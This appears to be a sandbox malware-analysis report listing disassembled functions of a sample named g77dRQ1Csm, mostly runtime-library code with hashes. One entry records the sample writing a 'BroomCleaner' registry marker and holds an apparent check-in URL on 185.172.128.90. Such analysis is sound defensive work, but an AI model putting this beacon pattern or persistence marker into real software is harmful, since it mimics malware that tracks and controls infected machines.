                                                                                                                                                                                                                              • Source File: 00000000.00000002.1899611037.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_3150000_g77dRQ1Csm.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _free$AllocateHeap
                                                                                                                                                                                                                              • String ID: B
                                                                                                                                                                                                                              • API String ID: 3033488037-2386870291
                                                                                                                                                                                                                              • Opcode ID: e2765243d4b407044065e09a93470513da81931724dfe5683d741b61e3df85b4
                                                                                                                                                                                                                              • Instruction ID: 19d0f45e8d004b344557c8442f1c0a0b12a247fb3e71bab805dfa7dc7f912ba3
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e2765243d4b407044065e09a93470513da81931724dfe5683d741b61e3df85b4
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6D51D835A00304AFDB24DFEADC41A6AB7F8EF4D724B54456DE849DB250EB31D921CB40
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetConsoleCP.KERNEL32(?,?,?,?,?,?,?,?,?,031663EF,?,?,?,?,?,?), ref: 03165CBC
                                                                                                                                                                                                                              • __fassign.LIBCMT ref: 03165D37
                                                                                                                                                                                                                              • __fassign.LIBCMT ref: 03165D52
                                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,?,00000005,00000000,00000000), ref: 03165D78
                                                                                                                                                                                                                              • WriteFile.KERNEL32(?,?,00000000,031663EF,00000000,?,?,?,?,?,?,?,?,?,031663EF,?), ref: 03165D97
                                                                                                                                                                                                                              • WriteFile.KERNEL32(?,?,00000001,031663EF,00000000,?,?,?,?,?,?,?,?,?,031663EF,?), ref: 03165DD0
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1899611037.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_3150000_g77dRQ1Csm.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1324828854-0
                                                                                                                                                                                                                              • Opcode ID: 4f4f63612dd6758aa9e7fecd2cbe65b3dc713529ec1a556737616ebe55c1ece4
                                                                                                                                                                                                                              • Instruction ID: fbe2b812aa6fdbfc61d4455dad84f48c3d948a4cd02b634aa7ee66823bc6c972
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4f4f63612dd6758aa9e7fecd2cbe65b3dc713529ec1a556737616ebe55c1ece4
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1951B170A002499FDF20CFA8DC85AEEFBF9EF09300F14416AE955E7291D7309961CBA4
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetConsoleCP.KERNEL32(?,?,?,?,?,?,?,?,?,00416188,?,?,?,?,?,?), ref: 00415A55
                                                                                                                                                                                                                              • __fassign.LIBCMT ref: 00415AD0
                                                                                                                                                                                                                              • __fassign.LIBCMT ref: 00415AEB
                                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,?,00000005,00000000,00000000), ref: 00415B11
                                                                                                                                                                                                                              • WriteFile.KERNEL32(?,?,00000000,00416188,00000000,?,?,?,?,?,?,?,?,?,00416188,?), ref: 00415B30
                                                                                                                                                                                                                              • WriteFile.KERNEL32(?,?,00000001,00416188,00000000,?,?,?,?,?,?,?,?,?,00416188,?), ref: 00415B69
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1324828854-0
                                                                                                                                                                                                                              • Opcode ID: 33e6fd75adb2b88f79627ef58a13688fd909e2cfbbaa5c9d8ec04a3e685d9078
                                                                                                                                                                                                                              • Instruction ID: 93abb8da7f4b1ee22325e29d014a78f54aaad6af2ae94e442d530b7aeff6bc03
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 33e6fd75adb2b88f79627ef58a13688fd909e2cfbbaa5c9d8ec04a3e685d9078
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7851E6B0A04609DFDB10CFA8D881BEEBBF4EF49310F14416BE955E7251D774A981CB68
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • _ValidateLocalCookies.LIBCMT ref: 0040A6FB
                                                                                                                                                                                                                              • ___except_validate_context_record.LIBVCRUNTIME ref: 0040A703
                                                                                                                                                                                                                              • _ValidateLocalCookies.LIBCMT ref: 0040A791
                                                                                                                                                                                                                              • __IsNonwritableInCurrentImage.LIBCMT ref: 0040A7BC
                                                                                                                                                                                                                              • _ValidateLocalCookies.LIBCMT ref: 0040A811
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                              • String ID: csm
                                                                                                                                                                                                                              • API String ID: 1170836740-1018135373
                                                                                                                                                                                                                              • Opcode ID: 9c4d965ac64c68ad1acf27fcd63e115faa6e970b3dad7dcbeead64b99ae0827c
                                                                                                                                                                                                                              • Instruction ID: 23505c37bb0df54e9d772fc2403dd448dd449399a7c5e18b9979e78af1eb181c
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9c4d965ac64c68ad1acf27fcd63e115faa6e970b3dad7dcbeead64b99ae0827c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B7415274E003089BCB10DF69C884A9EBBB5AF45318F14C17BE8156B3D2D739D925CB96
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • __EH_prolog.LIBCMT ref: 031763C6
                                                                                                                                                                                                                              • RegCreateKeyExA.ADVAPI32(80000001,SOFTWARE\BroomCleaner,00000000,00000000,00000000,000F003F,00000000,?,00000000,Installed,0043BED8,SOFTWARE\BroomCleaner), ref: 031763EE
                                                                                                                                                                                                                              • RegSetValueExA.ADVAPI32(?,?,00000000,00000001,?,?,0043BED8,0043BED9,Installed,Installed), ref: 03176471
                                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,185.172.128.90,/cpa/ping.php?substr=%s&s=ab&sub=%s,?), ref: 03176492
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1899611037.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_3150000_g77dRQ1Csm.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CloseCreateH_prologValue
                                                                                                                                                                                                                              • String ID: Installed$SOFTWARE\BroomCleaner
                                                                                                                                                                                                                              • API String ID: 1996196666-529226407
                                                                                                                                                                                                                              • Opcode ID: 0b1f03838103bc79192dd29aecd11cdb4eee571ac517255c8300f4294fb95730
                                                                                                                                                                                                                              • Instruction ID: fcf5cdadd6bf83b6dd65749572cd10d6a230638c1ab8ad02802e17609639583c
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0b1f03838103bc79192dd29aecd11cdb4eee571ac517255c8300f4294fb95730
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FB315872A00219EFDB15DFA8C890AFEBB79EB49214F08456DE90277251D7711D06CBA0
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 81ada43cddaa793191611bc99ca2e9e8f2b927b510fc63ccdaad96e19ac5d437
                                                                                                                                                                                                                              • Instruction ID: e24961ea6169977100e6de332b8cae97d730c3ba4f888c233ff9c32580c66a3b
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 81ada43cddaa793191611bc99ca2e9e8f2b927b510fc63ccdaad96e19ac5d437
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1611E7726081297BDB203F739D059AB3A6CDF92764B51062AFC15D7251DABCC84282B9
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 0316F25A: _free.LIBCMT ref: 0316F283
                                                                                                                                                                                                                              • _free.LIBCMT ref: 0316F561
                                                                                                                                                                                                                                • Part of subcall function 03166501: HeapFree.KERNEL32(00000000,00000000,?,0316F288,?,00000000,?,00000000,?,0316F52C,?,00000007,?,?,0316F920,?), ref: 03166517
                                                                                                                                                                                                                                • Part of subcall function 03166501: GetLastError.KERNEL32(?,?,0316F288,?,00000000,?,00000000,?,0316F52C,?,00000007,?,?,0316F920,?,?), ref: 03166529
                                                                                                                                                                                                                              • _free.LIBCMT ref: 0316F56C
                                                                                                                                                                                                                              • _free.LIBCMT ref: 0316F577
                                                                                                                                                                                                                              • _free.LIBCMT ref: 0316F5CB
                                                                                                                                                                                                                              • _free.LIBCMT ref: 0316F5D6
                                                                                                                                                                                                                              • _free.LIBCMT ref: 0316F5E1
                                                                                                                                                                                                                              • _free.LIBCMT ref: 0316F5EC
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1899611037.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_3150000_g77dRQ1Csm.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 776569668-0
                                                                                                                                                                                                                              • Opcode ID: 501a0837026fe0814ab2d6a77f43a53b196c1575d4fb2c1b0167c2d280276289
                                                                                                                                                                                                                              • Instruction ID: 7647c34cbcdeef1c6378708a1008d984ec484acef91f13c81e87325111c09f10
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 501a0837026fe0814ab2d6a77f43a53b196c1575d4fb2c1b0167c2d280276289
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2A110A7A544B04ABDA30FBF0DC4BFCB7B9DAF4C700F404819A69BAA050DB65E5258E61
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 0041EFF3: _free.LIBCMT ref: 0041F01C
                                                                                                                                                                                                                              • _free.LIBCMT ref: 0041F2FA
                                                                                                                                                                                                                                • Part of subcall function 0041629A: RtlFreeHeap.NTDLL(00000000,00000000,?,0041F021,?,00000000,?,00000000,?,0041F2C5,?,00000007,?,?,0041F6B9,?), ref: 004162B0
                                                                                                                                                                                                                                • Part of subcall function 0041629A: GetLastError.KERNEL32(?,?,0041F021,?,00000000,?,00000000,?,0041F2C5,?,00000007,?,?,0041F6B9,?,?), ref: 004162C2
                                                                                                                                                                                                                              • _free.LIBCMT ref: 0041F305
                                                                                                                                                                                                                              • _free.LIBCMT ref: 0041F310
                                                                                                                                                                                                                              • _free.LIBCMT ref: 0041F364
                                                                                                                                                                                                                              • _free.LIBCMT ref: 0041F36F
                                                                                                                                                                                                                              • _free.LIBCMT ref: 0041F37A
                                                                                                                                                                                                                              • _free.LIBCMT ref: 0041F385
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 776569668-0
                                                                                                                                                                                                                              • Opcode ID: 501a0837026fe0814ab2d6a77f43a53b196c1575d4fb2c1b0167c2d280276289
                                                                                                                                                                                                                              • Instruction ID: be7813cec9e76b844f682d4c097dbd82c10abeb52ecb146189267b1763b940f2
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 501a0837026fe0814ab2d6a77f43a53b196c1575d4fb2c1b0167c2d280276289
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1F114272541B24B6D920BB72DC07FCBB7DCBF44708F40081EBE9E66052DA7DB5868654
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • __EH_prolog.LIBCMT ref: 031543F5
                                                                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 03154404
                                                                                                                                                                                                                              • int.LIBCPMT ref: 0315441B
                                                                                                                                                                                                                                • Part of subcall function 0315157F: std::_Lockit::_Lockit.LIBCPMT ref: 03151590
                                                                                                                                                                                                                                • Part of subcall function 0315157F: std::_Lockit::~_Lockit.LIBCPMT ref: 031515AA
                                                                                                                                                                                                                              • std::locale::_Getfacet.LIBCPMT ref: 03154424
                                                                                                                                                                                                                              • std::_Facet_Register.LIBCPMT ref: 03154455
                                                                                                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 0315446B
                                                                                                                                                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 03154491
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1899611037.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_3150000_g77dRQ1Csm.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologRegisterThrowstd::locale::_
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1202896665-0
                                                                                                                                                                                                                              • Opcode ID: e4831a17e9389af87c191ca157e46dd7d187b50277cf216024756019587e60ea
                                                                                                                                                                                                                              • Instruction ID: c458f137adc01ab73d2f77306ba474d2f307cb149225c3d234ef68ccc34ec42c
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e4831a17e9389af87c191ca157e46dd7d187b50277cf216024756019587e60ea
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D611BF36940228DBCB05EBA4DC05AEEB774EF88214F15452AFC35AB290DF749A41CBE0
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • __EH_prolog.LIBCMT ref: 0040418E
                                                                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 0040419D
                                                                                                                                                                                                                              • int.LIBCPMT ref: 004041B4
                                                                                                                                                                                                                                • Part of subcall function 00401318: std::_Lockit::_Lockit.LIBCPMT ref: 00401329
                                                                                                                                                                                                                                • Part of subcall function 00401318: std::_Lockit::~_Lockit.LIBCPMT ref: 00401343
                                                                                                                                                                                                                              • std::locale::_Getfacet.LIBCPMT ref: 004041BD
                                                                                                                                                                                                                              • std::_Facet_Register.LIBCPMT ref: 004041EE
                                                                                                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 00404204
                                                                                                                                                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 0040422A
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologRegisterThrowstd::locale::_
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1202896665-0
                                                                                                                                                                                                                              • Opcode ID: 7f04bc736b480ee01d3eae57bcb919a2b9243a76784e8c0ad09bcb8f93a2b6a7
                                                                                                                                                                                                                              • Instruction ID: eeb1616ca6cccce41a0e0e35b82109652f5c3a79b41a9d78a32d17684d72b000
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7f04bc736b480ee01d3eae57bcb919a2b9243a76784e8c0ad09bcb8f93a2b6a7
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AD119072A041289BCB04EBA5DC06AEE7774EF84358F10456FF915B72D1DB389A04C7A9
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • __EH_prolog.LIBCMT ref: 03153861
                                                                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 03153870
                                                                                                                                                                                                                              • int.LIBCPMT ref: 03153887
                                                                                                                                                                                                                                • Part of subcall function 0315157F: std::_Lockit::_Lockit.LIBCPMT ref: 03151590
                                                                                                                                                                                                                                • Part of subcall function 0315157F: std::_Lockit::~_Lockit.LIBCPMT ref: 031515AA
                                                                                                                                                                                                                              • std::locale::_Getfacet.LIBCPMT ref: 03153890
                                                                                                                                                                                                                              • std::_Facet_Register.LIBCPMT ref: 031538C1
                                                                                                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 031538D7
                                                                                                                                                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 031538FD
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1899611037.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_3150000_g77dRQ1Csm.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologRegisterThrowstd::locale::_
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1202896665-0
                                                                                                                                                                                                                              • Opcode ID: 01699667aa2a77937d9adaa910a4886983fe4db3813f95f217182bdb03a19c45
                                                                                                                                                                                                                              • Instruction ID: 3bfb0660c741bee3e494baaa1d8508be295169d4108a955cb35dbe8f5f81835f
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 01699667aa2a77937d9adaa910a4886983fe4db3813f95f217182bdb03a19c45
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1D11947AD00214DBCB05EBA4C804BEEB775EF4C650F19496AFD31AB290DB749A04C790
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • __EH_prolog.LIBCMT ref: 03153656
                                                                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 03153665
                                                                                                                                                                                                                              • int.LIBCPMT ref: 0315367C
                                                                                                                                                                                                                                • Part of subcall function 0315157F: std::_Lockit::_Lockit.LIBCPMT ref: 03151590
                                                                                                                                                                                                                                • Part of subcall function 0315157F: std::_Lockit::~_Lockit.LIBCPMT ref: 031515AA
                                                                                                                                                                                                                              • std::locale::_Getfacet.LIBCPMT ref: 03153685
                                                                                                                                                                                                                              • std::_Facet_Register.LIBCPMT ref: 031536B6
                                                                                                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 031536CC
                                                                                                                                                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 031536F2
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1899611037.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_3150000_g77dRQ1Csm.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologRegisterThrowstd::locale::_
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1202896665-0
                                                                                                                                                                                                                              • Opcode ID: d912247cf65187564cb857c5a435760ff66a759f63cb392730071c1b62a8ae47
                                                                                                                                                                                                                              • Instruction ID: 130059a00f78ee6e540662a0af7387e912f07afa10ee8b9a8338ac8b2c4eedfd
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d912247cf65187564cb857c5a435760ff66a759f63cb392730071c1b62a8ae47
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E611917AD00228EBCB05EBA4C814BEEB775EF48250F14096AFC35AB2D0DB749A04C7D4
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • __EH_prolog.LIBCMT ref: 004033EF
                                                                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 004033FE
                                                                                                                                                                                                                              • int.LIBCPMT ref: 00403415
                                                                                                                                                                                                                                • Part of subcall function 00401318: std::_Lockit::_Lockit.LIBCPMT ref: 00401329
                                                                                                                                                                                                                                • Part of subcall function 00401318: std::_Lockit::~_Lockit.LIBCPMT ref: 00401343
                                                                                                                                                                                                                              • std::locale::_Getfacet.LIBCPMT ref: 0040341E
                                                                                                                                                                                                                              • std::_Facet_Register.LIBCPMT ref: 0040344F
                                                                                                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 00403465
                                                                                                                                                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 0040348B
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologRegisterThrowstd::locale::_
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1202896665-0
                                                                                                                                                                                                                              • Opcode ID: 731508520368e75c7ea612f84dcea702521109302910a029de8bbf3d5de5a9a9
                                                                                                                                                                                                                              • Instruction ID: cdc69c2a9e90ba919e1258be772e803faed7ee3eebec81448dba6679bc4cf361
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 731508520368e75c7ea612f84dcea702521109302910a029de8bbf3d5de5a9a9
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8E11BF329001289BCB05EFA4C815AEE7B78EF84319F10452EE911BB2D1DB789A04CB99
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • __EH_prolog.LIBCMT ref: 004035FA
                                                                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 00403609
                                                                                                                                                                                                                              • int.LIBCPMT ref: 00403620
                                                                                                                                                                                                                                • Part of subcall function 00401318: std::_Lockit::_Lockit.LIBCPMT ref: 00401329
                                                                                                                                                                                                                                • Part of subcall function 00401318: std::_Lockit::~_Lockit.LIBCPMT ref: 00401343
                                                                                                                                                                                                                              • std::locale::_Getfacet.LIBCPMT ref: 00403629
                                                                                                                                                                                                                              • std::_Facet_Register.LIBCPMT ref: 0040365A
                                                                                                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 00403670
                                                                                                                                                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 00403696
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologRegisterThrowstd::locale::_
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1202896665-0
                                                                                                                                                                                                                              • Opcode ID: 984f4820562becabbcd105a461c6a574276ccd078b5a22ee02043e0cc13f7d8e
                                                                                                                                                                                                                              • Instruction ID: 76a64bb1f13388b8652502aa8a079a3a0bf37f657045f8e793a704159d5c315e
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 984f4820562becabbcd105a461c6a574276ccd078b5a22ee02043e0cc13f7d8e
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FA119032900124ABCB14EF65C805AEE7B74AF48319F10456FE911B73D1DB389A04C799
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • _ValidateScopeTableHandlers.LIBCMT ref: 03177E37
                                                                                                                                                                                                                              • __FindPESection.LIBCMT ref: 03177E51
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1899611037.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_3150000_g77dRQ1Csm.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: FindHandlersScopeSectionTableValidate
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 876702719-0
                                                                                                                                                                                                                              • Opcode ID: bc384f76d8f635c5b2c6c749d7951069b59a0ece1133742fdae5e3cbfd5bbb72
                                                                                                                                                                                                                              • Instruction ID: 305ed28475dc465b79ac3dfaae3b5c9eab7b5dcf352450e3ecf850036386321e
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bc384f76d8f635c5b2c6c749d7951069b59a0ece1133742fdae5e3cbfd5bbb72
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 98A18C72A00655CBCB25CF68C984ABEB7B5EB0C310F2D4269D815EB391DB35ED41CBA4
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • _ValidateScopeTableHandlers.LIBCMT ref: 00427BD0
                                                                                                                                                                                                                              • __FindPESection.LIBCMT ref: 00427BEA
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: FindHandlersScopeSectionTableValidate
                                                                                                                                                                                                                              • String ID:
